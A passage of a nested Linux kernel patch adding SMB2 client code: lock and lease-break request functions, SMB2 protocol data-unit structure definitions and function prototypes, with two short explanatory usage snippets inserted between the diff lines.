++	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
++
++	rsp_len = le32_to_cpu(rsp->OutputBufferLength);
++	offset = le16_to_cpu(rsp->OutputBufferOffset);
++	rc = smb2_validate_iov(offset, rsp_len, &rsp_iov, min_len);
++	if (rc)
++		goto qfsattr_exit;
++
++	if (level == FS_ATTRIBUTE_INFORMATION)
++		memcpy(&tcon->fsAttrInfo, offset
++			+ (char *)rsp, min_t(unsigned int,
++			rsp_len, max_len));
++	else if (level == FS_DEVICE_INFORMATION)
++		memcpy(&tcon->fsDevInfo, offset
++			+ (char *)rsp, sizeof(FILE_SYSTEM_DEVICE_INFO));
++	else if (level == FS_SECTOR_SIZE_INFORMATION) {
++		struct smb3_fs_ss_info *ss_info = (struct smb3_fs_ss_info *)
++			(offset + (char *)rsp);
++		tcon->ss_flags = le32_to_cpu(ss_info->Flags);
++		tcon->perf_sector_size =
++			le32_to_cpu(ss_info->PhysicalBytesPerSectorForPerf);
++	} else if (level == FS_VOLUME_INFORMATION) {
++		struct smb3_fs_vol_info *vol_info = (struct smb3_fs_vol_info *)
++			(offset + (char *)rsp);
++		tcon->vol_serial_number = vol_info->VolumeSerialNumber;
++		tcon->vol_create_time = vol_info->VolumeCreationTime;
++	}
++
++qfsattr_exit:
++	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
++	return rc;
++}
++
++int
++smb2_lockv(const unsigned int xid, struct cifs_tcon *tcon,
++	   const __u64 persist_fid, const __u64 volatile_fid, const __u32 pid,
++	   const __u32 num_lock, struct smb2_lock_element *buf)
++{
++	struct smb_rqst rqst;
++	int rc = 0;
++	struct smb2_lock_req *req = NULL;
++	struct kvec iov[2];
++	struct kvec rsp_iov;
++	int resp_buf_type;
++	unsigned int count;
++	int flags = CIFS_NO_RSP_BUF;
++	unsigned int total_len;
++	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
++
++	cifs_dbg(FYI, "smb2_lockv num lock %d\n", num_lock);
++
++	rc = smb2_plain_req_init(SMB2_LOCK, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	req->hdr.Id.SyncId.ProcessId = cpu_to_le32(pid);
++	req->LockCount = cpu_to_le16(num_lock);
++
++	req->PersistentFileId = persist_fid;
++	req->VolatileFileId = volatile_fid;
++
++	count = num_lock * sizeof(struct smb2_lock_element);
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len - sizeof(struct smb2_lock_element);
++	iov[1].iov_base = (char *)buf;
++	iov[1].iov_len = count;
++
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_locks);
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 2;
++
++	rc = cifs_send_recv(xid, tcon->ses, server,
++			    &rqst, &resp_buf_type, flags,
++			    &rsp_iov);
++	cifs_small_buf_release(req);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in smb2_lockv = %d\n", rc);
++		cifs_stats_fail_inc(tcon, SMB2_LOCK_HE);
++		trace_smb3_lock_err(xid, persist_fid, tcon->tid,
++				    tcon->ses->Suid, rc);
++	}
++
++	return rc;
++}
++
++int
++SMB2_lock(const unsigned int xid, struct cifs_tcon *tcon,
++	  const __u64 persist_fid, const __u64 volatile_fid, const __u32 pid,
++	  const __u64 length, const __u64 offset, const __u32 lock_flags,
++	  const bool wait)
++{
++	struct smb2_lock_element lock;
++
++	lock.Offset = cpu_to_le64(offset);
++	lock.Length = cpu_to_le64(length);
++	lock.Flags = cpu_to_le32(lock_flags);
++	if (!wait && lock_flags != SMB2_LOCKFLAG_UNLOCK)
++		lock.Flags |= cpu_to_le32(SMB2_LOCKFLAG_FAIL_IMMEDIATELY);
++
++	return smb2_lockv(xid, tcon, persist_fid, volatile_fid, pid, 1, &lock);
++}
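
For reference, a hedged example call through the wrapper above. SMB2_LOCKFLAG_EXCLUSIVE_LOCK is the standard exclusive byte-range flag; with wait == false the helper ORs in SMB2_LOCKFLAG_FAIL_IMMEDIATELY so the server fails rather than blocks. xid, tcon, pid and the fids are assumed locals:

/* non-blocking exclusive lock on bytes [0, 4096) */
rc = SMB2_lock(xid, tcon, persist_fid, volatile_fid, pid,
	       4096 /* length */, 0 /* offset */,
	       SMB2_LOCKFLAG_EXCLUSIVE_LOCK, false /* wait */);
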
++
++int
++SMB2_lease_break(const unsigned int xid, struct cifs_tcon *tcon,
++		 __u8 *lease_key, const __le32 lease_state)
++{
++	struct smb_rqst rqst;
++	int rc;
++	struct smb2_lease_ack *req = NULL;
++	struct cifs_ses *ses = tcon->ses;
++	int flags = CIFS_OBREAK_OP;
++	unsigned int total_len;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int resp_buf_type;
++	__u64 *please_key_high;
++	__u64 *please_key_low;
++	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
++
++	cifs_dbg(FYI, "SMB2_lease_break\n");
++	rc = smb2_plain_req_init(SMB2_OPLOCK_BREAK, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	req->hdr.CreditRequest = cpu_to_le16(1);
++	req->StructureSize = cpu_to_le16(36);
++	total_len += 12;
++
++	memcpy(req->LeaseKey, lease_key, 16);
++	req->LeaseState = lease_state;
++
++	flags |= CIFS_NO_RSP_BUF;
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buf_type, flags, &rsp_iov);
++	cifs_small_buf_release(req);
++
++	please_key_low = (__u64 *)lease_key;
++	please_key_high = (__u64 *)(lease_key+8);
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_OPLOCK_BREAK_HE);
++		trace_smb3_lease_err(le32_to_cpu(lease_state), tcon->tid,
++			ses->Suid, *please_key_low, *please_key_high, rc);
++		cifs_dbg(FYI, "Send error in Lease Break = %d\n", rc);
++	} else
++		trace_smb3_lease_done(le32_to_cpu(lease_state), tcon->tid,
++			ses->Suid, *please_key_low, *please_key_high);
++
++	return rc;
++}
+diff --git a/fs/smb/client/smb2pdu.h b/fs/smb/client/smb2pdu.h
+new file mode 100644
+index 0000000000000..1237bb86e93a8
+--- /dev/null
++++ b/fs/smb/client/smb2pdu.h
+@@ -0,0 +1,434 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2009, 2013
++ *                 Etersoft, 2012
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Pavel Shilovsky (pshilovsky@samba.org) 2012
++ *
++ */
++
++#ifndef _SMB2PDU_H
++#define _SMB2PDU_H
++
++#include <net/sock.h>
++#include "cifsacl.h"
++
++/* 52 transform hdr + 64 hdr + 88 create rsp */
++#define SMB2_TRANSFORM_HEADER_SIZE 52
++#define MAX_SMB2_HDR_SIZE 204
++
++/* The total header size for SMB2 read and write */
++#define SMB2_READWRITE_PDU_HEADER_SIZE (48 + sizeof(struct smb2_hdr))
++
++/* See MS-SMB2 2.2.43 */
++struct smb2_rdma_transform {
++	__le16 RdmaDescriptorOffset;
++	__le16 RdmaDescriptorLength;
++	__le32 Channel; /* for values see channel description in smb2 read above */
++	__le16 TransformCount;
++	__le16 Reserved1;
++	__le32 Reserved2;
++} __packed;
++
++/* TransformType */
++#define SMB2_RDMA_TRANSFORM_TYPE_ENCRYPTION	0x0001
++#define SMB2_RDMA_TRANSFORM_TYPE_SIGNING	0x0002
++
++struct smb2_rdma_crypto_transform {
++	__le16	TransformType;
++	__le16	SignatureLength;
++	__le16	NonceLength;
++	__u16	Reserved;
++	__u8	Signature[]; /* variable length */
++	/* u8 Nonce[] */
++	/* followed by padding */
++} __packed;
++
++/*
++ *	Definitions for SMB2 Protocol Data Units (network frames)
++ *
++ *  See MS-SMB2.PDF specification for protocol details.
++ *  The Naming convention is the lower case version of the SMB2
++ *  command code name for the struct. Note that structures must be packed.
++ *
++ */
++
++#define COMPOUND_FID 0xFFFFFFFFFFFFFFFFULL
++
++#define SMB2_SYMLINK_STRUCT_SIZE \
++	(sizeof(struct smb2_err_rsp) - 1 + sizeof(struct smb2_symlink_err_rsp))
++
++#define SYMLINK_ERROR_TAG 0x4c4d5953
++
++struct smb2_symlink_err_rsp {
++	__le32 SymLinkLength;
++	__le32 SymLinkErrorTag;
++	__le32 ReparseTag;
++	__le16 ReparseDataLength;
++	__le16 UnparsedPathLength;
++	__le16 SubstituteNameOffset;
++	__le16 SubstituteNameLength;
++	__le16 PrintNameOffset;
++	__le16 PrintNameLength;
++	__le32 Flags;
++	__u8  PathBuffer[];
++} __packed;
++
++/* SMB 3.1.1 and later dialects. See MS-SMB2 section 2.2.2.1 */
++struct smb2_error_context_rsp {
++	__le32 ErrorDataLength;
++	__le32 ErrorId;
++	__u8  ErrorContextData; /* ErrorDataLength long array */
++} __packed;
++
++/* ErrorId values */
++#define SMB2_ERROR_ID_DEFAULT		0x00000000
++#define SMB2_ERROR_ID_SHARE_REDIRECT	cpu_to_le32(0x72645253)	/* "rdRS" */
++
++/* Defines for Type field below (see MS-SMB2 2.2.2.2.2.1) */
++#define MOVE_DST_IPADDR_V4	cpu_to_le32(0x00000001)
++#define MOVE_DST_IPADDR_V6	cpu_to_le32(0x00000002)
++
++struct move_dst_ipaddr {
++	__le32 Type;
++	__u32  Reserved;
++	__u8   address[16]; /* IPv4 followed by 12 bytes rsvd or IPv6 address */
++} __packed;
++
++struct share_redirect_error_context_rsp {
++	__le32 StructureSize;
++	__le32 NotificationType;
++	__le32 ResourceNameOffset;
++	__le32 ResourceNameLength;
++	__le16 Reserved;
++	__le16 TargetType;
++	__le32 IPAddrCount;
++	struct move_dst_ipaddr IpAddrMoveList[];
++	/* __u8 ResourceName[] */ /* Name of share as counted Unicode string */
++} __packed;
++
++/*
++ * Maximum number of iovs we need for an open/create request.
++ * [0] : struct smb2_create_req
++ * [1] : path
++ * [2] : lease context
++ * [3] : durable context
++ * [4] : posix context
++ * [5] : time warp context
++ * [6] : query id context
++ * [7] : compound padding
++ */
++#define SMB2_CREATE_IOV_SIZE 8
++
++/*
++ * Maximum size of a SMB2_CREATE response is 64 (smb2 header) +
++ * 88 (fixed part of create response) + 520 (path) + 208 (contexts) +
++ * 2 bytes of padding.
++ */
++#define MAX_SMB2_CREATE_RESPONSE_SIZE 880
++
++#define SMB2_LEASE_READ_CACHING_HE	0x01
++#define SMB2_LEASE_HANDLE_CACHING_HE	0x02
++#define SMB2_LEASE_WRITE_CACHING_HE	0x04
++
++struct create_durable {
++	struct create_context ccontext;
++	__u8   Name[8];
++	union {
++		__u8  Reserved[16];
++		struct {
++			__u64 PersistentFileId;
++			__u64 VolatileFileId;
++		} Fid;
++	} Data;
++} __packed;
++
++/* See MS-SMB2 2.2.13.2.11 */
++/* Flags */
++#define SMB2_DHANDLE_FLAG_PERSISTENT	0x00000002
++struct durable_context_v2 {
++	__le32 Timeout;
++	__le32 Flags;
++	__u64 Reserved;
++	__u8 CreateGuid[16];
++} __packed;
++
++struct create_durable_v2 {
++	struct create_context ccontext;
++	__u8   Name[8];
++	struct durable_context_v2 dcontext;
++} __packed;
++
++/* See MS-SMB2 2.2.13.2.12 */
++struct durable_reconnect_context_v2 {
++	struct {
++		__u64 PersistentFileId;
++		__u64 VolatileFileId;
++	} Fid;
++	__u8 CreateGuid[16];
++	__le32 Flags; /* see above DHANDLE_FLAG_PERSISTENT */
++} __packed;
++
++/* See MS-SMB2 2.2.14.2.9 */
++struct create_on_disk_id {
++	struct create_context ccontext;
++	__u8   Name[8];
++	__le64 DiskFileId;
++	__le64 VolumeId;
++	__u32  Reserved[4];
++} __packed;
++
++/* See MS-SMB2 2.2.14.2.12 */
++struct durable_reconnect_context_v2_rsp {
++	__le32 Timeout;
++	__le32 Flags; /* see above DHANDLE_FLAG_PERSISTENT */
++} __packed;
++
++struct create_durable_handle_reconnect_v2 {
++	struct create_context ccontext;
++	__u8   Name[8];
++	struct durable_reconnect_context_v2 dcontext;
++	__u8   Pad[4];
++} __packed;
++
++/* See MS-SMB2 2.2.13.2.5 */
++struct crt_twarp_ctxt {
++	struct create_context ccontext;
++	__u8	Name[8];
++	__le64	Timestamp;
++
++} __packed;
++
++/* See MS-SMB2 2.2.13.2.9 */
++struct crt_query_id_ctxt {
++	struct create_context ccontext;
++	__u8	Name[8];
++} __packed;
++
++struct crt_sd_ctxt {
++	struct create_context ccontext;
++	__u8	Name[8];
++	struct smb3_sd sd;
++} __packed;
++
++
++#define COPY_CHUNK_RES_KEY_SIZE	24
++struct resume_key_req {
++	char ResumeKey[COPY_CHUNK_RES_KEY_SIZE];
++	__le32	ContextLength;	/* MBZ */
++	char	Context[];	/* ignored, Windows sets to 4 bytes of zero */
++} __packed;
++
++/* this goes in the ioctl buffer when doing a copychunk request */
++struct copychunk_ioctl {
++	char SourceKey[COPY_CHUNK_RES_KEY_SIZE];
++	__le32 ChunkCount; /* we are only sending 1 */
++	__le32 Reserved;
++	/* array will only be one chunk long for us */
++	__le64 SourceOffset;
++	__le64 TargetOffset;
++	__le32 Length; /* how many bytes to copy */
++	__u32 Reserved2;
++} __packed;
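
A hedged sketch of populating the single-chunk request the comments above describe; resume_key (obtained via a resume_key_req response) and src_off, dst_off, chunk_len are assumed locals:

struct copychunk_ioctl cc = {
	.ChunkCount   = cpu_to_le32(1),		/* "we are only sending 1" */
	.SourceOffset = cpu_to_le64(src_off),
	.TargetOffset = cpu_to_le64(dst_off),
	.Length       = cpu_to_le32(chunk_len),
};

memcpy(cc.SourceKey, resume_key, COPY_CHUNK_RES_KEY_SIZE);
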
++
++struct copychunk_ioctl_rsp {
++	__le32 ChunksWritten;
++	__le32 ChunkBytesWritten;
++	__le32 TotalBytesWritten;
++} __packed;
++
++/* See MS-FSCC 2.3.29 and 2.3.30 */
++struct get_retrieval_pointer_count_req {
++	__le64 StartingVcn; /* virtual cluster number (signed) */
++} __packed;
++
++struct get_retrieval_pointer_count_rsp {
++	__le32 ExtentCount;
++} __packed;
++
++/*
++ * See MS-FSCC 2.3.33 and 2.3.34
++ * request is the same as get_retrieval_point_count_req struct above
++ */
++struct smb3_extents {
++	__le64 NextVcn;
++	__le64 Lcn; /* logical cluster number */
++} __packed;
++
++struct get_retrieval_pointers_refcount_rsp {
++	__le32 ExtentCount;
++	__u32  Reserved;
++	__le64 StartingVcn;
++	struct smb3_extents extents[];
++} __packed;
++
++/* See MS-DFSC 2.2.2 */
++struct fsctl_get_dfs_referral_req {
++	__le16 MaxReferralLevel;
++	__u8 RequestFileName[];
++} __packed;
++
++/* DFS response is struct get_dfs_refer_rsp */
++
++/* See MS-SMB2 2.2.31.3 */
++struct network_resiliency_req {
++	__le32 Timeout;
++	__le32 Reserved;
++} __packed;
++/* There is no buffer for the response, i.e. no struct network_resiliency_rsp */
++
++#define RSS_CAPABLE	cpu_to_le32(0x00000001)
++#define RDMA_CAPABLE	cpu_to_le32(0x00000002)
++
++#define INTERNETWORK	cpu_to_le16(0x0002)
++#define INTERNETWORKV6	cpu_to_le16(0x0017)
++
++struct network_interface_info_ioctl_rsp {
++	__le32 Next; /* next interface. zero if this is last one */
++	__le32 IfIndex;
++	__le32 Capability; /* RSS or RDMA Capable */
++	__le32 Reserved;
++	__le64 LinkSpeed;
++	__le16 Family;
++	__u8 Buffer[126];
++} __packed;
++
++struct iface_info_ipv4 {
++	__be16 Port;
++	__be32 IPv4Address;
++	__be64 Reserved;
++} __packed;
++
++struct iface_info_ipv6 {
++	__be16 Port;
++	__be32 FlowInfo;
++	__u8   IPv6Address[16];
++	__be32 ScopeId;
++} __packed;
++
++#define NO_FILE_ID 0xFFFFFFFFFFFFFFFFULL /* general ioctls to srv not to file */
++
++struct compress_ioctl {
++	__le16 CompressionState; /* See cifspdu.h for possible flag values */
++} __packed;
++
++/*
++ * Maximum number of iovs we need for an ioctl request.
++ * [0] : struct smb2_ioctl_req
++ * [1] : in_data
++ */
++#define SMB2_IOCTL_IOV_SIZE 2
++
++/*
++ *	PDU query infolevel structure definitions
++ *	BB consider moving to a different header
++ */
++
++struct smb2_file_full_ea_info { /* encoding of response for level 15 */
++	__le32 next_entry_offset;
++	__u8   flags;
++	__u8   ea_name_length;
++	__le16 ea_value_length;
++	char   ea_data[]; /* \0 terminated name plus value */
++} __packed; /* level 15 Set */
++
++struct smb2_file_reparse_point_info {
++	__le64 IndexNumber;
++	__le32 Tag;
++} __packed;
++
++struct smb2_file_network_open_info {
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 AllocationSize;
++	__le64 EndOfFile;
++	__le32 Attributes;
++	__le32 Reserved;
++} __packed; /* level 34 Query also similar returned in close rsp and open rsp */
++
++/* See MS-FSCC 2.4.21 */
++struct smb2_file_id_information {
++	__le64	VolumeSerialNumber;
++	__u64  PersistentFileId; /* opaque endianness */
++	__u64  VolatileFileId; /* opaque endianness */
++} __packed; /* level 59 */
++
++/* See MS-FSCC 2.4.18 */
++struct smb2_file_id_extd_directory_info {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 FileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize; /* EA size */
++	__le32 ReparsePointTag; /* valid if FILE_ATTR_REPARSE_POINT set in FileAttributes */
++	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit */
++	char FileName[1];
++} __packed; /* level 60 */
++
++extern char smb2_padding[7];
++
++/* equivalent of the contents of SMB3.1.1 POSIX open context response */
++struct create_posix_rsp {
++	u32 nlink;
++	u32 reparse_tag;
++	u32 mode;
++	struct cifs_sid owner; /* var-sized on the wire */
++	struct cifs_sid group; /* var-sized on the wire */
++} __packed;
++
++#define SMB2_QUERY_DIRECTORY_IOV_SIZE 2
++
++/*
++ * SMB2-only POSIX info level for query dir
++ *
++ * See posix_info_sid_size(), posix_info_extra_size() and
++ * posix_info_parse() to help with the handling of this struct.
++ */
++struct smb2_posix_info {
++	__le32 NextEntryOffset;
++	__u32 Ignored;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 DosAttributes;
++	__le64 Inode;
++	__le32 DeviceId;
++	__le32 Zero;
++	/* beginning of POSIX Create Context Response */
++	__le32 HardLinks;
++	__le32 ReparseTag;
++	__le32 Mode;
++	/*
++	 * var sized owner SID
++	 * var sized group SID
++	 * le32 filenamelength
++	 * u8  filename[]
++	 */
++} __packed;
++
++/*
++ * Parsed version of the above struct. Allows direct access to the
++ * variable length fields
++ */
++struct smb2_posix_info_parsed {
++	const struct smb2_posix_info *base;
++	size_t size;
++	struct cifs_sid owner;
++	struct cifs_sid group;
++	int name_len;
++	const u8 *name;
++};
++
++#endif				/* _SMB2PDU_H */
+diff --git a/fs/smb/client/smb2proto.h b/fs/smb/client/smb2proto.h
+new file mode 100644
+index 0000000000000..be21b5d26f67e
+--- /dev/null
++++ b/fs/smb/client/smb2proto.h
+@@ -0,0 +1,284 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002, 2011
++ *                 Etersoft, 2012
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Pavel Shilovsky (pshilovsky@samba.org) 2012
++ *
++ */
++#ifndef _SMB2PROTO_H
++#define _SMB2PROTO_H
++#include <linux/nls.h>
++#include <linux/key-type.h>
++
++struct statfs;
++struct smb_rqst;
++
++/*
++ *****************************************************************
++ * All Prototypes
++ *****************************************************************
++ */
++extern int map_smb2_to_linux_error(char *buf, bool log_err);
++extern int smb2_check_message(char *buf, unsigned int length,
++			      struct TCP_Server_Info *server);
++extern unsigned int smb2_calc_size(void *buf);
++extern char *smb2_get_data_area_len(int *off, int *len,
++				    struct smb2_hdr *shdr);
++extern __le16 *cifs_convert_path_to_utf16(const char *from,
++					  struct cifs_sb_info *cifs_sb);
++
++extern int smb2_verify_signature(struct smb_rqst *, struct TCP_Server_Info *);
++extern int smb2_check_receive(struct mid_q_entry *mid,
++			      struct TCP_Server_Info *server, bool log_error);
++extern struct mid_q_entry *smb2_setup_request(struct cifs_ses *ses,
++					      struct TCP_Server_Info *,
++					      struct smb_rqst *rqst);
++extern struct mid_q_entry *smb2_setup_async_request(
++			struct TCP_Server_Info *server, struct smb_rqst *rqst);
++extern struct cifs_ses *smb2_find_smb_ses(struct TCP_Server_Info *server,
++					   __u64 ses_id);
++extern struct cifs_tcon *smb2_find_smb_tcon(struct TCP_Server_Info *server,
++						__u64 ses_id, __u32  tid);
++extern int smb2_calc_signature(struct smb_rqst *rqst,
++				struct TCP_Server_Info *server,
++				bool allocate_crypto);
++extern int smb3_calc_signature(struct smb_rqst *rqst,
++				struct TCP_Server_Info *server,
++				bool allocate_crypto);
++extern void smb2_echo_request(struct work_struct *work);
++extern __le32 smb2_get_lease_state(struct cifsInodeInfo *cinode);
++extern bool smb2_is_valid_oplock_break(char *buffer,
++				       struct TCP_Server_Info *srv);
++extern int smb3_handle_read_data(struct TCP_Server_Info *server,
++				 struct mid_q_entry *mid);
++extern int smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
++				struct cifs_sb_info *cifs_sb, const char *path,
++				__u32 *reparse_tag);
++int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
++			 struct cifs_sb_info *cifs_sb, const char *full_path,
++			 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse);
++extern int smb2_set_path_size(const unsigned int xid, struct cifs_tcon *tcon,
++			      const char *full_path, __u64 size,
++			      struct cifs_sb_info *cifs_sb, bool set_alloc);
++extern int smb2_set_file_info(struct inode *inode, const char *full_path,
++			      FILE_BASIC_INFO *buf, const unsigned int xid);
++extern int smb311_posix_mkdir(const unsigned int xid, struct inode *inode,
++			       umode_t mode, struct cifs_tcon *tcon,
++			       const char *full_path,
++			       struct cifs_sb_info *cifs_sb);
++extern int smb2_mkdir(const unsigned int xid, struct inode *inode,
++		      umode_t mode, struct cifs_tcon *tcon,
++		      const char *name, struct cifs_sb_info *cifs_sb);
++extern void smb2_mkdir_setinfo(struct inode *inode, const char *full_path,
++			       struct cifs_sb_info *cifs_sb,
++			       struct cifs_tcon *tcon, const unsigned int xid);
++extern int smb2_rmdir(const unsigned int xid, struct cifs_tcon *tcon,
++		      const char *name, struct cifs_sb_info *cifs_sb);
++extern int smb2_unlink(const unsigned int xid, struct cifs_tcon *tcon,
++		       const char *name, struct cifs_sb_info *cifs_sb);
++extern int smb2_rename_path(const unsigned int xid, struct cifs_tcon *tcon,
++			    const char *from_name, const char *to_name,
++			    struct cifs_sb_info *cifs_sb);
++extern int smb2_create_hardlink(const unsigned int xid, struct cifs_tcon *tcon,
++				const char *from_name, const char *to_name,
++				struct cifs_sb_info *cifs_sb);
++extern int smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++			struct cifs_sb_info *cifs_sb, const unsigned char *path,
++			char *pbuf, unsigned int *pbytes_written);
++extern int smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++			  struct cifs_sb_info *cifs_sb,
++			  const unsigned char *path, char *pbuf,
++			  unsigned int *pbytes_read);
++int smb2_parse_symlink_response(struct cifs_sb_info *cifs_sb, const struct kvec *iov, char **path);
++int smb2_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock,
++		   void *buf);
++extern int smb2_unlock_range(struct cifsFileInfo *cfile,
++			     struct file_lock *flock, const unsigned int xid);
++extern int smb2_push_mandatory_locks(struct cifsFileInfo *cfile);
++extern void smb2_reconnect_server(struct work_struct *work);
++extern int smb3_crypto_aead_allocate(struct TCP_Server_Info *server);
++extern unsigned long smb_rqst_len(struct TCP_Server_Info *server,
++				  struct smb_rqst *rqst);
++extern void smb2_set_next_command(struct cifs_tcon *tcon,
++				  struct smb_rqst *rqst);
++extern void smb2_set_related(struct smb_rqst *rqst);
++
++/*
++ * SMB2 Worker functions - most of protocol specific implementation details
++ * are contained within these calls.
++ */
++extern int SMB2_negotiate(const unsigned int xid,
++			  struct cifs_ses *ses,
++			  struct TCP_Server_Info *server);
++extern int SMB2_sess_setup(const unsigned int xid, struct cifs_ses *ses,
++			   struct TCP_Server_Info *server,
++			   const struct nls_table *nls_cp);
++extern int SMB2_logoff(const unsigned int xid, struct cifs_ses *ses);
++extern int SMB2_tcon(const unsigned int xid, struct cifs_ses *ses,
++		     const char *tree, struct cifs_tcon *tcon,
++		     const struct nls_table *);
++extern int SMB2_tdis(const unsigned int xid, struct cifs_tcon *tcon);
++extern int SMB2_open(const unsigned int xid, struct cifs_open_parms *oparms,
++		     __le16 *path, __u8 *oplock,
++		     struct smb2_file_all_info *buf,
++		     struct create_posix_rsp *posix,
++		     struct kvec *err_iov, int *resp_buftype);
++extern int SMB2_open_init(struct cifs_tcon *tcon,
++			  struct TCP_Server_Info *server,
++			  struct smb_rqst *rqst,
++			  __u8 *oplock, struct cifs_open_parms *oparms,
++			  __le16 *path);
++extern void SMB2_open_free(struct smb_rqst *rqst);
++extern int SMB2_ioctl(const unsigned int xid, struct cifs_tcon *tcon,
++		     u64 persistent_fid, u64 volatile_fid, u32 opcode,
++		     char *in_data, u32 indatalen, u32 maxoutlen,
++		     char **out_data, u32 *plen /* returned data len */);
++extern int SMB2_ioctl_init(struct cifs_tcon *tcon,
++			   struct TCP_Server_Info *server,
++			   struct smb_rqst *rqst,
++			   u64 persistent_fid, u64 volatile_fid, u32 opcode,
++			   char *in_data, u32 indatalen,
++			   __u32 max_response_size);
++extern void SMB2_ioctl_free(struct smb_rqst *rqst);
++extern int SMB2_change_notify(const unsigned int xid, struct cifs_tcon *tcon,
++			u64 persistent_fid, u64 volatile_fid, bool watch_tree,
++			u32 completion_filter, u32 max_out_data_len,
++			char **out_data, u32 *plen /* returned data len */);
++
++extern int __SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
++			u64 persistent_fid, u64 volatile_fid,
++			struct smb2_file_network_open_info *pbuf);
++extern int SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
++		      u64 persistent_file_id, u64 volatile_file_id);
++extern int SMB2_close_init(struct cifs_tcon *tcon,
++			   struct TCP_Server_Info *server,
++			   struct smb_rqst *rqst,
++			   u64 persistent_fid, u64 volatile_fid,
++			   bool query_attrs);
++extern void SMB2_close_free(struct smb_rqst *rqst);
++extern int SMB2_flush(const unsigned int xid, struct cifs_tcon *tcon,
++		      u64 persistent_file_id, u64 volatile_file_id);
++extern int SMB2_flush_init(const unsigned int xid, struct smb_rqst *rqst,
++			   struct cifs_tcon *tcon,
++			   struct TCP_Server_Info *server,
++			   u64 persistent_file_id, u64 volatile_file_id);
++extern void SMB2_flush_free(struct smb_rqst *rqst);
++extern int SMB311_posix_query_info(const unsigned int xid, struct cifs_tcon *tcon,
++		u64 persistent_fid, u64 volatile_fid, struct smb311_posix_qinfo *data, u32 *plen);
++extern int SMB2_query_info(const unsigned int xid, struct cifs_tcon *tcon,
++			   u64 persistent_file_id, u64 volatile_file_id,
++			   struct smb2_file_all_info *data);
++extern int SMB2_query_info_init(struct cifs_tcon *tcon,
++				struct TCP_Server_Info *server,
++				struct smb_rqst *rqst,
++				u64 persistent_fid, u64 volatile_fid,
++				u8 info_class, u8 info_type,
++				u32 additional_info, size_t output_len,
++				size_t input_len, void *input);
++extern void SMB2_query_info_free(struct smb_rqst *rqst);
++extern int SMB2_query_acl(const unsigned int xid, struct cifs_tcon *tcon,
++			  u64 persistent_file_id, u64 volatile_file_id,
++			  void **data, unsigned int *plen, u32 info);
++extern int SMB2_get_srv_num(const unsigned int xid, struct cifs_tcon *tcon,
++			    u64 persistent_fid, u64 volatile_fid,
++			    __le64 *uniqueid);
++extern int smb2_async_readv(struct cifs_readdata *rdata);
++extern int SMB2_read(const unsigned int xid, struct cifs_io_parms *io_parms,
++		     unsigned int *nbytes, char **buf, int *buf_type);
++extern int smb2_async_writev(struct cifs_writedata *wdata,
++			     void (*release)(struct kref *kref));
++extern int SMB2_write(const unsigned int xid, struct cifs_io_parms *io_parms,
++		      unsigned int *nbytes, struct kvec *iov, int n_vec);
++extern int SMB2_echo(struct TCP_Server_Info *server);
++extern int SMB2_query_directory(const unsigned int xid, struct cifs_tcon *tcon,
++				u64 persistent_fid, u64 volatile_fid, int index,
++				struct cifs_search_info *srch_inf);
++extern int SMB2_query_directory_init(unsigned int xid, struct cifs_tcon *tcon,
++				     struct TCP_Server_Info *server,
++				     struct smb_rqst *rqst,
++				     u64 persistent_fid, u64 volatile_fid,
++				     int index, int info_level);
++extern void SMB2_query_directory_free(struct smb_rqst *rqst);
++extern int SMB2_set_eof(const unsigned int xid, struct cifs_tcon *tcon,
++			u64 persistent_fid, u64 volatile_fid, u32 pid,
++			__le64 *eof);
++extern int SMB2_set_info_init(struct cifs_tcon *tcon,
++			      struct TCP_Server_Info *server,
++			      struct smb_rqst *rqst,
++			      u64 persistent_fid, u64 volatile_fid, u32 pid,
++			      u8 info_class, u8 info_type, u32 additional_info,
++			      void **data, unsigned int *size);
++extern void SMB2_set_info_free(struct smb_rqst *rqst);
++extern int SMB2_set_acl(const unsigned int xid, struct cifs_tcon *tcon,
